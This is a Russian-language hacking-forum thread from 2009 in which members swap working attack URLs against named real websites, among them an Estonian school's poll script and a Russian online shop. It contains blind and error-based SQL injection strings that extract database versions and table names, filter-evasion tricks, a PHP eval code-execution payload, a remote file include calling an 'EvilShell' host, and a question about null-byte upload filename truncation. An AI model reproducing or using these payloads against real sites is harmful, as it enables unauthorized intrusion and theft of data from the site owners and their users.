Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    мор1ров заюзай

    http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(version(),1,1)=5,1,(select+1+union+select+2))
     
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    blind в demo_3.php
    Code:
    http://www.astangukool.edu.ee/rus/poll/db/demo_3.php?poll_id=4+and+substring(version(),1,1)=5--
    Code:
    http://www.astangukool.edu.ee/rus/poll/db/misc/info.php
     
    #10282 z00MAN, 24 Nov 2009
    Last edited: 24 Nov 2009
    1 person likes this.
  3. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Что так,что эдак - ничего не достать)
     
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Все прекрасно достается

    http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(ascii(substring((select+table_name+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>5,1,(select+1+union+select+2))

    Читай статью https://forum.antichat.ru/thread35207.html
     
    2 people like this.
  5. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    да да Advanced Poll 2.02 :D
    например http://milw0rm.com/exploits/3282
     
    #10285 LzD, 24 Nov 2009
    Last edited: 24 Nov 2009
  6. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
     
  7. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    Грей писал скрипт для работы со слепыми инжектами :)
     
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
     
    4 people like this.
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если which нету, значит результат будет пустой, поэтому он не покажет есть ли качалки или их нет...
     
  10. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    http://securityvulns.com/Odocument594.html :(
    http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd=Http://EvilShell
    (с) alguidy[at]hotmail[.]com
     
    #10290 LzD, 25 Nov 2009
    Last edited: 25 Nov 2009
  11. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
    Content-Type: multipart/form-data

    Если да то как это сделать? Правильно ли я это делаю
    (этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
    ...
    filename="thistest.php\x00.jpg"
    ...

    второй вариант который пробывал:
    ...
    filename="thistest.php\0.jpg"
    ...

    2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
    Content-Type: multipart/form-data

    То как быть если часть названия файла до бек слеша ("\")
    отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
    Content-Type: multipart/form-data

    Заранее спасибо за ответы
     
  12. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    подскажите раскручиваемо??

    http://www.wearhouse.ru/?page=item&id=125'

    ???
     
  13. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    направьте на путь истинный или пример подзапроса
     
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.wearhouse.ru/?page=item&id=125+and+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))>1

    свеб агрится на юнион =)
     
    1 person likes this.
  15. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    херня, в подзапросах используется select, и дело тут не только в селекте.


    http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--+

    Duplicate column name '5.0.26-lk-log'
     
    6 people like this.
  16. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    Каким образом догнать до этого?
    софт?
    опыт?
    SIPT мне не помог(
     
  17. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Опыт + анализ :(
     
  18. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?
     
  19. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    http://sql-ex.ru/help/
     
    1 person likes this.
  20. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
    from/**/information_schema.tables/**/limit/**/0,1)
    ,14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+

    Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
     
    1 person likes this.
Thread Status:
Not open for further replies.